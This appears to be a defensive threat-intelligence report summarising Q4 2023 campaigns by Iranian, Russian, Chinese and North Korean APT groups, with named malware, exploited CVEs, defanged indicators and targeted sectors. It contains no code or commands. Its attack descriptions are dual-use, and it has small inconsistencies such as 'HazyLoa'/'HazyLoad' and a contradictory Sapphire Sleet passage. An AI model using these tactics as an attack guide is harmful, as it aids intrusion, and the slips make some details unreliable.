In the fourth quarter of 2023, Advanced Persistent Threat (APT) groups from diverse global regions, including China, North Korea, Iran, and Russia, demonstrated a surge in dynamic and innovative cyber activities, posing significant challenges to the global cybersecurity landscape.
Iranian threat actors, including IMPERIAL KITTEN, MuddyWater, and OilRig, escalated cyber operations across diverse sectors, employing refined techniques and sophisticated malware frameworks. Most Iranian threat actors’ campaigns are influenced by the Isarel-Hamas conflict in the region.
Simultaneously, Russian threat actors, notably APT28, and APT29 exhibited an alarming escalation with innovative tactics, including exploiting a Roundcube Webmail zero-day and leveraging a WinRAR vulnerability. Winter Vivern showcased adaptability by introducing the LittleDrifter worm through USB drives, emphasizing a sustained focus on governmental organizations.
Chinese threat actors exhibited noteworthy cyber capabilities, with Volt Typhoon showcasing agility by leveraging the KV-Botnet to target small office/home office (SOHO) devices and expanding to Axis IP cameras. ToddyCat, another Chinese-affiliated APT group, unveiled a new set of malicious tools emphasizing data exfiltration, showcasing evolving tactics. Also, the “Stayin’ Alive” campaign attributed to ToddyCat highlighted the use of “disposable” malware to target government organizations and telecommunication service providers across Asia.
Meanwhile, North Korean threat actors, including Lazarus Group and subgroups like Diamond Sleet, Onyx Sleet, and Sapphire Sleet, engaged in sophisticated cyber operations. Lazarus Group’s Operation Blacksmith revealed the use of new DLang-based malware families targeting European manufacturing entities, while Operation Dream Magic exploited vulnerabilities in MagicLine4NX software. Sapphire Sleet shifted tactics to target IT job seekers through fake skills assessment portals.
Overall, this report provides a comprehensive analysis of the dynamic APT activities observed in Q4 2023, highlighting the imperative for ongoing vigilance, user education, and prompt software updates in the ever-evolving cybersecurity landscape.
Technique observed
Targeted Country
Targeted Technology
Targeted Industries
In Q4 2023, the Iranian threat group IMPERIAL KITTEN intensified its cyber operations, focusing on sectors such as transportation, logistics, and technology. Their modus operandi involved enticing victims with adversary-controlled websites based on shared interests, especially after the Israel-Hamas conflict. Their tactics included the deployment of public scanning tools, one-day exploits, SQL injections, and the misuse of VPN credentials for initial breaches. For lateral movement, they employed tools like PAExec and engaged in credential theft. Their data exfiltration methods employed both custom and readily available malware, with notable similarities to their Liderc malware family, indicating a continued reliance on email-based command and control (C2) mechanisms. IMPERIAL KITTEN’s operations often exploit social engineering, predominantly through job recruitment-themed content, to disseminate custom .NET-based implants. Their historical targets span industries like defense, technology, telecommunications, maritime, energy, and consulting.
During Q4 2023, amidst the Israel-Hamas conflict, MuddyWater initiated a sophisticated social engineering campaign targeting Israel, incorporating updated tactics, techniques, and procedures (TTPs). Central to their strategy was the use of a new public hosting service and a deceptive LNK file to trigger infections. Furthermore, they introduced an intermediate malware layer that imitates directory openings while deploying a fresh remote administration tool. Upon successful infiltration, MuddyWater operators harnessed this legitimate tool for target reconnaissance. Subsequently, they employed PowerShell scripts, prompting the compromised system to communicate with a tailored command and control (C2) server. While MuddyWater has previously utilized PhonyC2, recent observations indicate a shift towards a new C2 framework dubbed MuddyC2Go.
In another campaign, Muddywater intensified its focus on the telecommunications sectors in Egypt, Sudan, and Tanzania. Their campaign observed in November showcased a blend of familiar and novel tools, notably the recently uncovered MuddyC2Go infrastructure. Beyond this, the group employed the SimpleHelp remote access tool, Venom Proxy, a bespoke keylogger, and a mix of publicly accessible and “living-off-the-land” tools. Notably, the campaign’s initial traces pointed to PowerShell activities associated with the MuddyC2Go backdoor. Muddywater ‘s persistent activities underscore its active threat status, particularly for entities that might attract Iranian strategic interests.
In Q4 2023, the Iran-associated APT group, ‘OilRig,’ intensified its cyber operations targeting Israel’s critical sectors, notably healthcare, manufacturing, and government. Employing a series of newly developed lightweight downloaders, namely SampleCheck5000 (SC5k v1-v3), ODAgent, OilCheck, and OilBooster, OilRig enhanced its extensive portfolio of bespoke malware tools. Distinctively, these downloaders exploit legitimate cloud services like Microsoft OneDrive and various Microsoft Graph APIs for both command-and-control (C2) communications and data exfiltration, marking a departure from traditional methods. Among the targeted entities were a healthcare facility, a manufacturing firm, a local governmental body, and several undisclosed Israeli organizations. Notably, OilRig’s selection of these targets was strategic, revisiting entities previously subjected to the group’s cyber onslaught, suggesting the downloaders’ efficacy in evading detection by seamlessly integrating into routine network traffic.
The Iran-associated APT group, Agrius, launched its cyber operations against Israeli higher education and technology sectors. From January to October, Agrius orchestrated a multifaceted campaign aimed at pilfering personally identifiable information (PII), intellectual property, and subsequently deploying wipers like MultiLayer, PartialWasher, and BFG Agonizer to erase digital footprints. During the infiltration phase, Agrius leveraged vulnerable web servers, bolstering its access through multiple web shells. To evade detection, the group harnessed a repertoire of proof-of-concept exploits, pentesting instruments, and custom tools. Agrius’ operational toolkit encompassed publicly accessible tools such as Nbtscan, Wineggdrop and NimScan for reconnaissance, Mimikatz for credential theft, Plink for lateral movement, and WinSCP and Putty for data exfiltration. Notably, their Sqlextractor tool specialized in querying SQL databases, extracting a plethora of sensitive data, ranging from ID numbers to passport scans and contact details.
The IRGC-affiliated cyber group operating under the alias “CyberAv3ngers” increased its activities, targeting Israeli-made Unitronics Vision Series programmable logic controllers (PLCs) predominantly used in the Water and Wastewater Systems (WWS) sector. These PLCs, versatilely deployed across sectors including energy, food and beverage manufacturing, and healthcare. Recently, Unitronics Vision Series PLC at a water system facility in Pennsylvania was compromised by Iran-affiliated attackers, as verified by CISA. Notably, CyberAv3ngers has a track record of targeting critical infrastructure in Israel and has recently expanded its scope to U.S.-based water and wastewater facilities. In response, CISA has issued directives urging water authorities to enhance PLC security by modifying default credentials, implementing robust access controls like firewalls, VPNs, and multi-factor authentication, regularly backing up configurations, and updating to the latest PLC/HMI versions.
Technique observed
Targeted Country
Targeted Technology
Targeted Industries
In Q4 2023, the Russian APT group; Cozy Bear, exhibited a sophisticated cyber campaign by exploiting a TeamCity server authentication vulnerability, specifically tracked as CVE-2023-42793, which had been disclosed and patched in September. This widespread exploitation, impacting “a few dozen” companies across the U.S., Europe, Asia, and Australia, targeted entities ranging from an energy trade association to software providers in various sectors. Notably, the compromised companies included those involved in billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games, as well as hosting and IT firms. While CISA clarified that Cozy Bear’s tactics did not mirror the SolarWinds incident, it cautioned that the activity posed a supply chain threat. Following initial access and privilege escalation through the TeamCity vulnerability, the threat actor employed the GraphicalProton backdoor, utilizing Microsoft OneDrive and Dropbox for data sharing with the SVR operator. Employing the “bring your own vulnerable driver” technique, Cozy Bear demonstrated a novel evasion tactic, aligning with the increasingly common methods observed among ransomware groups. The compromise of a TeamCity server offers malicious actors access to source code, signing certificates, and the potential to manipulate software compilation and deployment processes, thereby enabling supply chain operations. Recent scans revealed 700 unpatched TeamCity servers globally, predominantly in the U.S. and Europe.
In another sophisticated cyber campaign, APT29 demonstrated exploiting a recently discovered vulnerability in the Windows file archiver tool WinRAR, identified as CVE-2023-38831. State-controlled hackers affiliated with Russia and China had already leveraged this bug in early 2023, before it was patched, leaving unpatched versions of WinRAR exposed to potential exploitation. In this recent campaign APT29, deployed phishing emails enticing victims with a link to a PDF document, alongside a malicious ZIP file exploiting the WinRAR vulnerability. The fabricated lure involved claims of information regarding the sale of diplomatic BMW cars, a tactic previously employed during their attack on Kyiv embassies. Notably, APT29 innovatively combined this traditional phishing method with a new technique: using a Ngrok free static domain to access the command and control (C2) server hosted on their Ngrok instance. This method effectively concealed their activity, allowing the attackers to communicate with compromised systems without raising detection risks. APT29’s observed campaign stands out for its adept fusion of old and new techniques, showcasing the strategic use of the WinRAR vulnerability for payload delivery and Ngrok services to obfuscate C2 communication.
In Q4 2023, the Russian state-sponsored APT28, also known as “Fancybear” or “Strontium,” emerged as an active threat, exploiting the CVE-2023-23397 Outlook vulnerability to compromise Microsoft Exchange accounts and pilfer sensitive data. The scope of their activities encompassed government, energy, transportation, and other vital organizations in the United States, Europe, and the Middle East. APT28 demonstrated a strategic approach, reserving the use of these exploits for instances where the benefits of access and intelligence outweighed the risks of public exposure. The revelation disclosed that APT28 had been leveraging this flaw since April 2022 through specially crafted Outlook notes, designed to steal NTLM hashes, enabling unauthorized access to attacker-controlled SMB shares without user interaction. Exploiting the uncomplicated privilege escalation, APT28 executed lateral movement within the victim’s environment, manipulating Outlook mailbox permissions for targeted email theft. Despite the availability of security updates and mitigation recommendations, the attack surface remained substantial, emphasizing the persistent challenge posed by APT28’s strategic and targeted exploitation.
In another incident, the Computer Emergency Response Team of Ukraine (CERT-UA) sounded the alarm on a novel cyber espionage campaign orchestrated by the Russia-linked APT28, also known as “Forest Blizzard,” “Fancybear,” or “Strontium.” This campaign marked a strategic shift, as APT28 deployed previously undetected malware, including OCEANMAP, MASEPIE, and STEELHOOK, to covertly extract sensitive information from targeted networks. CERT-UA’s investigation uncovered a series of phishing attacks, specifically targeting government organizations between December 15 and December 25. The phishing emails employed deceptive tactics, enticing recipients to click on embedded links under the pretense of accessing a document. Once clicked, victims were redirected to a web resource, where leveraging JavaScript and the application protocol “search” (“ms-search”), a shortcut file (LNK) was downloaded. Upon opening the LNK file, a PowerShell command initiated the download of a decoy document from a remote server, accompanied by the Python interpreter and the MASEPIE tool. MASEPIE, a Python-based utility, served the dual purpose of uploading/unloading files and executing commands. Notably, APT28 utilized MASEPIE to introduce OPENSSH (for tunneling), STEELHOOK PowerShell scripts (for data extraction from Chrome/Edge browsers), and the OCEANMAP backdoor into the compromised environments, underscoring the group’s evolving and sophisticated tactics in pursuit of their espionage objectives.
In Q4 2023, a recently uncovered worm, dubbed LittleDrifter, emerged as a tool within the arsenal of the Gamaredon state-sponsored espionage group, spreading via USB drives and infecting systems across several countries. Researchers detected signs of compromise in the United States, Ukraine, Germany, Vietnam, Poland, Chile, and Hong Kong, indicating that LittleDrifter may have strayed beyond its intended targets, possibly due to a loss of control by the threat group. While members of the APT were previously identified as employees of Russia’s Federal Security Service (FSB), Gamaredon has also engaged in hack-for-hire activities. Notably, the group has displayed adaptability, altering tactics and tools to effectively compromise Ukrainian targets and maintain persistent access to their networks. LittleDrifter, a recently identified self-propagating USB worm, stands as a testament to this adaptability. Written in VBScript, the malware possesses functionalities to automatically spread to USB drives, communicate with a diverse set of command-and-control (C&C) servers, and execute payloads received from the C&C. Despite its apparent simplicity, LittleDrifter aligns with Gamaredon’s overarching strategy, emphasizing effectiveness over complexity, a principle that has proven successful in sustaining the group’s activities, particularly in Ukraine.
The Russian hacking group; Winter Vivern, heightened its cyber operations by exploiting a zero-day vulnerability in Roundcube Webmail, targeting European government entities and think tanks since at least October 11. The Roundcube development team promptly addressed the security concern, releasing updates to rectify the Stored Cross-Site Scripting (XSS) vulnerability (CVE-2023-5631). Winter Vivern’s modus operandi involved leveraging HTML email messages, embedding meticulously crafted SVG documents to remotely inject arbitrary JavaScript code. Their phishing tactics mimicked the Outlook Team, enticing victims to open malicious emails, automatically triggering a first-stage payload that exploited the Roundcube email server vulnerability. The final JavaScript payload deployed in these attacks facilitated the harvesting and theft of emails from compromised webmail servers. Winter Vivern’s strategic focus on governmental organizations, particularly those using Zimbra and Roundcube email servers, dates back to at least 2022. Notably, the same vulnerability was exploited by the Russian APT28 military intelligence hackers affiliated with Russia’s General Staff Main Intelligence Directorate (GRU) to compromise Roundcube email servers within the Ukrainian government. Winter Vivern’s evolution from exploiting known vulnerabilities to deploying a zero-day underscores their persistent threat, demonstrated through regular phishing campaigns, making them a significant concern for European and Asian governments.
Technique observed
Targeted Country
Targeted Industries
Targeted Technology
The Chinese APT group; volt-typhoon, demonstrated sophistication in their cyber operations during Q4. The link of the KV-Botnet to the China-linked threat actor Volt Typhoon has been disclosed by researchers during this period. The botnet has been operational since February 2022, targets small office/home office (SOHO) devices, including routers, and recently expanded to Axis IP cameras. Volt Typhoon, known for infiltrating critical infrastructure, employs living-off-the-land techniques and hands-on-keyboard activity to evade detection. The threat actor is seen routing malicious traffic through compromised SOHO network devices. The recent shift to target IP cameras and infrastructure remodeling suggests preparation for an upcoming campaign. The researchers predict a continued focus on EoL SOHO devices to establish covert infrastructures, taking advantage of the abundance of outdated devices lacking patch eligibility and often associated with users lacking resources and expertise for monitoring and detecting malicious activities.
Volt Typhoon’s primary motivation revolves around building capabilities to potentially disrupt critical communications infrastructure between the United States and the Asia region in the event of future crises. Notably, the observed campaign, limited to China-linked actors, has focused primarily on strategic interests in the Indo-Pacific region, with a discernible concentration on Internet Service Providers (ISPs) and government organizations.
In a significant development during October, the Chinese APT41 group, also known as Wicked Panda, has been linked to the use of the surveillance toolkit LightSpy. APT41 employed spam messages to deceive users into downloading a malicious WeChat application from third-party app stores. The LightSpy malware, compatible with iOS and Android devices, is capable of exfiltrating private information, including precise location, payment data, call recordings, and chat archives. APT41, previously associated with web application attacks and software vulnerability exploitation, has recently shifted tactics to develop mobile-specific malware. The group’s use of LightSpy for iOS and DragonEgg for Android demonstrates its ability to target multiple platforms. The malicious WeChat version enabled broad access permissions on targeted devices, facilitating the exfiltration of internal private information. The threat actors behind APT41 have active servers in China, Singapore, and Russia, primarily targeting victims in the Asia-Pacific region.
A recently uncovered campaign named “Stayin’ Alive” has been systematically targeting government organizations and telecommunication service providers across Asia since 2021, with Q4 2023 observations revealing its use of diverse “disposable” malware to evade detection. The campaign primarily employs loaders and downloaders, with some serving as initial infection vectors against high-profile Asian organizations in Kazakhstan, Uzbekistan, Pakistan, and Vietnam. One notable tool; CurKeep, is activated by executing a legitimate executable signed by Zoom, loading dal_keepalives[dot]dll, which in turn initiates CurKeep. Additional custom-made tools involved in the campaign include CurLu, CurCore, and StylerServ. Spear-phishing emails serve as the campaign’s delivery method, distributing archived files using DLL side-loading schemes, exploiting dal_keepalives[dot]dll in Audinate’s Dante Discovery software (CVE-2022-23748). Driven by espionage motives, the ToddyCat APT group orchestrating the Stayin’ Alive campaign has a history of pilfering sensitive data such as intellectual property, trade secrets, and government documents. Operating since at least 2020, ToddyCat employs various techniques, including spear-phishing emails, zero-day exploits, and supply chain attacks, to gain access to target systems, subsequently deploying a range of malware, including backdoors, trojans, and keyloggers.
Meanwhile, ToddyCat has recently been associated with a novel set of malicious tools designed for data exfiltration. While the group’s weaponry prominently features the Ninja Trojan and a backdoor known as Samurai, a fresh array of malicious software has been developed and maintained by ToddyCat to achieve persistence, conduct file operations, and dynamically load additional payloads. This includes a suite of loaders with the ability to launch the Ninja Trojan as a second stage, LoFiSe for locating and collecting targeted files, a DropBox uploader for storing stolen data, and Pcexter for exfiltrating archive files to Microsoft OneDrive. In addition to these tools, ToddyCat employs custom scripts for data collection, a passive backdoor that receives commands via UDP packets, Cobalt Strike for post-exploitation maneuvers, and compromised domain admin credentials to facilitate lateral movement, amplifying its espionage activities. Notably, the observed script variants are tailored explicitly for data collection and file copying to specific folders, excluding them from compressed archives. In such instances, the actor executes the script on the remote host using standard remote task execution techniques, manually transfers the collected files to the exfiltration host via the xcopy utility, and ultimately compresses them using the 7z binary. This multifaceted approach underscores ToddyCat’s commitment to advanced and intricate methodologies in pursuit of its espionage objectives.
Technique observed
Targeted Country
Targeted Technology
Targeted Industries
In a recent cybersecurity revelation, the Lazarus Group, a sophisticated hacking collective, associated with North Korea, has initiated an advanced operation known as “Operation Blacksmith.” This operation introduces three new DLang-based malware families, including the Telegram-based “NineRAT” and the non-Telegram-based RAT named “DLRAT,” along with a DLang-based downloader named “BottomLoader.” The targeted assault specifically focuses on European manufacturing entities in September 2023, South American agricultural organizations, and an American subsidiary of a South Korean physical security firm as early as May 2023. Operation Blacksmith unfolds in two main phases, with the Lazarus group exploiting CVE-2021-44228 (Log4Shell) in Phase 1 to gain initial access to publicly-facing VMWare Horizon servers. Following successful exploitation, the group conducts preliminary reconnaissance and installs a proxy tool for direct access to the compromised system.
The BottomLoader downloader is then utilized to avoid detection, downloading, and executing the next stage payload, such as HazyLoa. HazyLoa dynamically switches to new remote IP addresses to maintain access. In Phase 2, after successful credential dumping, Lazarus introduces the new RATs, NineRAT and DLRAT, with DLRAT employing innovative tactics to enhance communication with the Command and Control (C2) server. NineRAT engages in Telegram-based communication, re-fingerprinting infected systems. This operation reveals a dynamic and sophisticated APT campaign marked by diverse programming languages, innovative tactics, and opportunistic targeting of critical sectors. The existence of sub-groups within Lazarus emphasizes collaboration and specialization, showcasing a multifaceted and adaptive threat landscape. The group’s commitment to persistence, redundancy in backdoor entries, and hands-on keyboard activities underscores the ongoing evolution of APT strategies.
In Q4 2023 the North Korean Lazarus Group’s sub-group; BlueNoroff, has initiated a campaign named “RustBucket,” featuring a newly unveiled Mac malware named “ObjCShellz” and targeting users in the US and Japan. Described as “dumbed down” yet effective, the malware serves the purpose of opening remote shells on compromised devices. The malicious payload establishes communication with the swissborg[.]blog, a command-and-control domain posing as a legitimate cryptocurrency exchange site. BlueNoroff’s campaigns maintain a financial motivation, with a consistent focus on cryptocurrency exchanges, venture capital firms, and banks. The group employs social engineering tactics, masquerading as investors or headhunters to blend in with legitimate crypto company activities, aligning with the Rustbucket campaign. From a technical standpoint, ObjCShellz is notably simplistic, functioning as a basic reverse shell for Apple computers that allows command execution from an attacker’s server. Written in Objective-C, the malware operates as a straightforward remote shell executing commands sent from the attacker server. While the method of initial access remains unclear, ObjCShellz is likely employed as a later-stage tool for manual command execution, post-system compromise. Despite its apparent differences from the previously mentioned RustBucket malware used in other attacks, both instances underscore the attacker’s focus on providing a straightforward remote shell capability.
Another cyber-attack named Operation Dream Magic emerged in Q4, and it has been attributed to the Lazarus group from North Korea. The attackers are using a flaw in MagicLine4NX software, affecting versions before 1.0.026. They start by compromising a news website and embedding harmful code. When users with vulnerable software visit the compromised site, the code executes, allowing attackers to take control of their systems. The malicious code then performs various actions like spying, stealing data and moving through the network. The attackers use the network’s data synchronization function to spread the code to the organization’s servers, compromising PCs.
Meanwhile, in a significant development, North Korean APT groups; Diamond Sleet and Onyx Sleet, operating under the Lazarus Group, have been actively exploiting a critical vulnerability, CVE-2023-42793, in JetBrains TeamCity, as highlighted by Microsoft. This vulnerability, with a CVSS score of 9.8, allows for authentication bypass in the on-premises version of TeamCity. Exploiting this flaw provides attackers with the ability to pilfer source code, service secrets, and private keys, compromising the integrity of software used by downstream users. The attacks involve sophisticated chains, incorporating PowerShell-based payload downloads, DLL search-order hijacking, and the creation of unauthorized user accounts. State-sponsored hackers leverage custom tools such as ForestTiger and HazyLoad, and exploit RDP for system compromise and credential retrieval. Recognizing the severity of the situation, the U.S. CISA added JetBrains TeamCity to its Known Exploited Vulnerabilities Catalog in October, underscoring the urgency of addressing this threat.
In a noteworthy shift of tactics, North Korea’s APT group Sapphire Sleet; a subset of Lazarus known for cryptocurrency theft from exchanges, venture capital firms, and banks, has initiated a targeted campaign against IT job seekers, using deceptive skills assessment portals. This new social engineering effort involves the creation of fraudulent websites, designed to deceive recruiters, marking a departure from the group’s previous use of LinkedIn. Engaging victims through instant messaging and email, Sapphire Sleet employs weaponized attachments or links on legitimate platforms like GitHub. Researchers emphasize the significance of this evolution, as the group adapts its communication methods and employs new attack vectors, such as the creation of deceptive websites, following prior exposures.
In Q4 2023, threat actors from Iran, Russia, and China continued to engage in sophisticated and diverse cyber operations, showcasing adaptability and innovation in their tactics, techniques, and procedures (TTPs). Iranian actors, targeted organizations in the telecommunications sector, higher education, and technology sectors, employing updated TTPs and leveraging new C2 frameworks. Russian APT activities focused on exploiting vulnerabilities such as the TeamCity server flaw, Windows file archiver tool WinRAR, Outlook vulnerability, and Roundcube email server vulnerability, showcasing a continued focus on supply chain attacks. Chinese threat actors, represented by Volt Typhoon and ToddyCat, demonstrated a focus on targeting small office/home office (SOHO) devices and utilizing advanced malware for data exfiltration. North Korean Lazarus Group, through operations like Operation Blacksmith and Operation Dream Magic, revealed their proficiency in diverse programming languages, exploiting vulnerabilities like Log4Shell and MagicLine4NX, and employing social engineering tactics. These threat actors displayed a dynamic approach in their TTPs, emphasizing the importance of cybersecurity vigilance and countermeasures against evolving APT strategies.